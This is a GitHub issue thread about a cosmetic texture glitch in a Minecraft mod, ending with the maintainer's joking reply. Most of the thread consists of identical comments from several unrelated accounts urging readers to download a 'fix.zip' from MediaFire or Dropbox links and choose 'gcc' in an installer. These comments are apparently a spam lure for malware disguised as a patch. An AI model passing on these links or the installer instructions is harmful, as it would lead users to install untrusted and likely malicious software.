### ISSUE TITLE
[MUST READ] THE MOST SERIOUS ISSUE ON HERE

### ISSUE THREAD

**Issue by geradeaus007** [motivational-dragon/Potion-Blender#14]
There seem to be a few miscolored pixels in the brewing cauldron gui for jei. 
Mind you that this version 1.20.1 FORGE 3.1.1, included in ATM9 is currently ruining my playthrough because of this issue.

![image](https://github.com/user-attachments/assets/4fbd97e6-68ac-4df6-bc3a-b5ec29ff2ce5)

Very curious... This seems to be a high priority fix!

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by motivational-dragon** [comment]
. 　　　。　　　　•　 　ﾟ　　。 　　.

　　　.　　　 　　.　　　　　。　　 。　. 　

.　　 。　　　• . 　　 • 　　　　•

　　ﾟ　　 Gray was an Impostor.　 ඞ。　.

　　'　　　 0 Impostor remains 　 　　。

　　ﾟ　　　.　　　. 　　　　.　 .
　　
　　
That said, I'm impressed that you've seen it LMAO. When i drew the texture at 3 a.m. I didn't think anyone would notice the slight color variation in the sprite. It'll have to hide itself better in the next version (if I port this to 1.21.1).
